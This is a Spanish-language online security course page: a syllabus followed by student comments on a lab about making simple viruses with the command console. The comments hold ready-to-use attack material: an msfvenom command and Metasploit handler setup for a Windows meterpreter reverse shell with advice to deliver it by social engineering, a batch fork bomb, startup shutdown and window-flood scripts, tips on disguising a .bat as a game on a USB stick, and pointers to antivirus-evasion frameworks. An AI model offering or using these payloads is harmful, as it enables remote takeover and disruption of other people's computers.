Introducci贸n a la Seguridad Inform谩tica

1

Qu茅 aprender谩s sobre seguridad inform谩tica

2

Objetivo Seguridad Inform谩tica

3

Principios fundamentales de la Informaci贸n

4

T茅rminos relacionados con la Seguridad Inform谩tica

Principios b谩sicos en la Seguridad Inform谩tica

5

Los 5 principios clave de la seguridad inform谩tica

6

C贸mo instalar VirtualBox

7

C贸mo instalar VMWARE

8

Laboratorio: Importaci贸n y Montaje de la M谩quina Virtual en VirtualBox desde cero

9

Laboratorio: Importaci贸n y Montaje de la M谩quina Virtual con VMWare

10

Laboratorio: Creaci贸n de usuarios en Windows aplicando el principio del menor privilegio

11

Laboratorio: Creaci贸n de usuarios en Linux aplicando el principio de menor privilegio

Seguridad en Redes TCP/IP

12

Modelo TCP/IP

13

Introducci贸n a la seguridad en redes TCP/IP

14

Modelo OSI simplificado

15

Seguridad por debajo de la capa 3

16

Laboratorio: Realizar un escaneo de puertos

17

Laboratorio: Realizar an谩lisis de protocolos con la herramienta Wireshark

Dispositivos de Seguridad Inform谩tica

18

Dispositivos de seguridad inform谩tica: Firewalls - Honeypot - Antivirus - Anti-Spam - VPN鈥檚 - IPS

19

Implementaci贸n del Honeypot Dionaea

Hackers y Fases de un Hacking

20

驴Qu茅 es un Hacker? Clases de Hacker

21

C贸mo instalar FOCA

22

Qu茅 es Hacking y fases del Hacking

23

Laboratorio: analizando metadatos usando la herramienta FOCA

24

Laboratorio: Obtener todos los Datos disponibles de algunos Sitios Web con WHOIS

25

Laboratorio: Realizar Email tracking

Manejo de Incidentes de Seguridad

26

Manejo de incidentes de seguridad 驴Qu茅 es un incidente de seguridad? Administraci贸n de incidentes de seguridad

27

Recomendaciones para la atenci贸n y manejo de incidentes de seguridad

Introducci贸n al Malware

28

Qu茅 es malware y cu谩les son sus tipos

29

Laboratorio: Creaci贸n de virus sencillos utilizando la consola de comandos

Ingenier铆a Social

30

Ingenier铆a Social: Conceptos generales. Fases de un ataque de ingenier铆a social. Tipos de ataques y contramedidas

Est谩ndares Internacionales de Seguridad

31

Est谩ndares Internacionales de Seguridad: COBIT, ITIL, OWASP, CIS, NIST, ISO27001

32

Reto: an谩lisis de las Pol铆ticas de Seguridad Inform谩tica de organizaciones reconocidas para identificar los componentes de seguridad de los est谩ndares internacionales

Conclusiones

33

Conclusiones y cierre del curso

Bonus

34

驴Qu茅 es un firewall?

No tienes acceso a esta clase

隆Contin煤a aprendiendo! 脷nete y comienza a potenciar tu carrera

Laboratorio: Creaci贸n de virus sencillos utilizando la consola de comandos

29/34
Recursos

Aportes 52

Preguntas 3

Ordenar por:

驴Quieres ver m谩s aportes, preguntas y respuestas de la comunidad?

o inicia sesi贸n.

Hola, mencionar tambi茅n que para crear un malware desde la distro de Linux, Kali Linux, pueden seguir los siguientes pasos:

Desde la consola escribir

msfvenom -p windows/meterpreter/reverse_tcp LHOST=(LaIpDelHost) LPORT=(ElN煤meroDelPuerto) -f > exe (NombreDelMalware).exe

驴Qu茅 estamos haciendo?
Bien, primero estamos usando la herramienta msfvenom, la cual nos sirve para crear payloads, el -p es para asignar que paylodad usaremos, en este caso se usara el payload 鈥渨indows/meterpreter/reverse_tcp鈥 esto significa que tendremos una sesi贸n de meterpreter para controlar al equipo infectado a trav茅s de un protocolo tcp reverso, luego estamos asignado el LHOST, es decir, la ip del equipo desde la cual controlaremos al equipo infectado, luego el LPORT que por defecto se usa el 4444, luego le asignamos el formato y le decimos que ser谩 un .exe y le damos un nombre, y as铆 nos generar谩 el malware, ya queda usar algo de ingenier铆a social para hacer que este malware entre al equipo que queremos infectar. (Cabe resaltar que este tipo de malware ya es detectado por muchos antivirus, es solo como gu铆a para que vean como se pueden crear malware un poco m谩s 鈥渁vanzados鈥.

Luego de esto, necesitamos tener en escucha nuestra consola para poder conectarnos remotamente al equipo infectado, para poder poner nuestra consola en escucha, usaremos:

Primero escribimos:

msfconsole

Una vez que se abra msfconsole escribimos los siguientes comandos:

use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST (LaIpDelHost)
set LPORT (ElN煤meroDelPuerto)

una vez configurado escribiremos:

exploit o run

le damos a enter y ya estar谩 escuchando.

(Este m茅todo funciona en redes lan donde ambos dispositivos, el atacante y el atacado est谩n en la misma red, puede ser en redes externas a la privada pero en ese caso se tendr铆a que abrir el puerto a usar en la configuraci贸n del router y usar la ip publica de nuestra m谩quina no la privada.)
脷senlo para fines 茅ticos.

Otra forma de hacer un bucle abriendo las aplicaciones es esta
sin tener que copiar varias veces
@echo off
:e
start cmd. exe
start calc.exe
goto e

Esto no es nada pero lo es todo para mi 馃挏

Yo creo que muchos hicimos esa broma y conoc铆amos esto jajaj llenar un bloc de notas de miles de Start y apenas lo habr谩n una lluvia de ventanas jajaja tenia un amigo que hacia que se iniciaran paginas digamos, no aptas para menores de edad jajajajajaaj

Incluso el enga帽o se puede disimular mejor todav铆a de la siguiente manera, se crea una carpeta dentro del usb con cualquier nombre, en este caso yo le puse 鈥楧ATA鈥 , dentro de esa carpeta se pone el archivo .bat original y un archivo de imagen del tipo .ico 鈥 Luego hacemos un acceso directo del .bat al archivo ra铆z del usb, y le cambiamos el nombre a 鈥渏uego mario鈥 o lo que sea. Una vez creado el acceso directo nos vamos a propiedades > change icon > browse , navegamos hasta la carpeta 鈥楧ATA鈥 del usb y seleccionamos el archivo .ico para cambiar la imagen del shortcut, luego aplicar.

Venga ya鈥
隆Tremendo curso, no me arrepiento de tomarlo! 馃槃

start calc.exe
start notepad.exe
start cmd.exe

La NASA quiere saber su ubicaci贸n !!!

usteded considera realmente ese archivo .bat como virus? Que bajo nivel

Incluso de puede hacer una Bomba Fork que es aun mas peligroso, podr铆an crear un archivo en bloc de notas y escribir %0|%0, lo guardan como .bat y cuando lo abren, b谩sicamente te deja congelada la computadora y no podr谩s hacer nada, poco a poco se empezara a alentar y en algunas ocasiones ni siquiera te dejara apagarla. Si se llega a probar este Script pueden hacerlo en una maquina virtual para que no da帽en su computadora principal, es preferible virtualizar e intentarlo, no importa que versi贸n de Windows sea, en todas las versiones cuelga a Windows.

En la secundaria hac铆a bat鈥檚 con bromas similares, les cambiaba el icono para que pareciera que era Word o Internet Explorer y al abrir, PUM! Empezaba a mandar alertas con mensajes de broma para espantar a los dem谩s.

Los .BAT, son muy comunes que se bloqueen por cualquier antivirus, o hasta el mismo software de correo.

Me acuerdo cuando en primaria me ponia a 鈥榩rogramar鈥 en bat. Algo que hacia era poner el comando 鈥榮hutdown鈥 con un timer y un mensaje de 鈥榯e hackea muajaja鈥. Era divertido dejarlos en mi labratoria de computo haha

buen ejemplo, tambien se puede poner a que se ejecute solito sin esperar el clic del usuario con un autorun (windows)

para que tanto start si tan solo necesitas que se habra google chrome

Dejo un poquito un c贸digo un poquito m谩s elaborado en VBasic, que se podr铆a renombrar o esconder dentro de una aplicaci贸n o fotograf铆a.

<do
msgbox "Este es un virus"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run chr(34) & "SP26" & Chr(34), 0
Set WshShell = Nothing
loop>

Me logro sacar una buena risa, muy divertido

dammmmm que cool jajaja increible

En una ocacion hice uno en C++ donde llenaba el disco duro con basura

Si quieren generar payloads que hagan bypass del antivirus, les recomiendo utilizar:

Veil Framkework
https://github.com/Veil-Framework/Veil

Empire
https://github.com/EmpireProject/Empire

El mejor curso hasta el momento 馃槃

horrible curso

me parece interesante la forma en la que podemos crear virus y ejecutarlos en las maquinas a las cuales les vamos a hacer el ataque

Otra broma podria ser colocar un codigo como:
shutdown -s -t 5
Guardarlo como un .bat y colocarlo el .bat en el inicio de windows. La maquina se apagara cada vez que inicie windows, una de las formas de retiarlo seria ingresando por modo seguro y quitar el .bat del inicio. XD

no lo habia pensado, pero esto me hizo recordar las 鈥渂romas鈥 de youtuber donde filtran el numero de alguien y su celular colapsa de tantas llamadas y mensajes que recibe por parte de las personas como si fuera un ataque DDoS

que sencillo es crear un virus y uno descargando cualquier archivo en el pc

Gracias por los laboratorios

Este script no ser铆a un virus ya que carece de facilidades para autoreplicarse.

Muy interesante , lo pasare a otros鈥

Buena pr谩ctica. Implementarlo en VB fue genial. Saludos

Que simple hacer un virus jajaja quien lo dir铆a

un ejemplo muy simple

super e interesante esta creaci贸n de virus鈥

muy muy simple el virus lo que dif铆cil de pasar por Internet,

Molestare a mis amigos con ese virus =) ja gracias y aprender =)

super

(Y)

Interesante, por all铆 lo envi茅 para jugar un abroma a un par de amigos veremos que pasa.

Muy sencillo crear este tipo de virus.

.

si voy a hacerlo con mis amigos con un aviso al principio donde diga que me deben una cerveza por reparar su computadora. jajajajaja!!!

buen aporte

La maquina virtual de windows no me reconoce el pendrive. que sera?

Esto funciona as铆 por que est谩 usando la terminal de windows verdad? Por ejemplo quiero hacer algo para alg煤n sistema basado en unix, tengo que usar el lenguaje del shell no? por que en esos sistemas el shell mismo tiene su propio lenguaje de programaci贸n.

ejejej Esta interesante

Para generar payloads que hagan un excelente bypass del antivirus, les recomiendo:
Veil Framework
https://github.com/Veil-Framework/Veil

Empire
https://github.com/EmpireProject/Empire

Alguien tiene mas informaci贸n como esta? es interesante.

Recuerdo en uno de los laboratorios de mis primeros cursos de programaci贸n en la universidad, tratando de hacer una calculadora con punteros, en varias ocasiones me saltaba el antivirus con una alerta donde dec铆a 鈥渟e ha detectado un gusano鈥︹.

Que lindo que es el mundo de la programaci贸n jejeje.馃ぃ

Hacer estas cosas tan simples y que pueden ser tan molestas es algo divertido, no me quiero ni imaginar lo que debe ser hacer un malware que realmente genere un da帽o significativo.

Profesor hice el .bar en la laptop de mi mama y ahora ya no enciende 馃槮

Que clase tan interesante, la verdad con algo tan sencillo se puede hacer tantas cosas.
Me encanta mucho este concepto de curso en el cual tienes laboratorios en donde puedes realizar este tipo de pruebas.

Muy Divertido este laboratorio.
Btcrt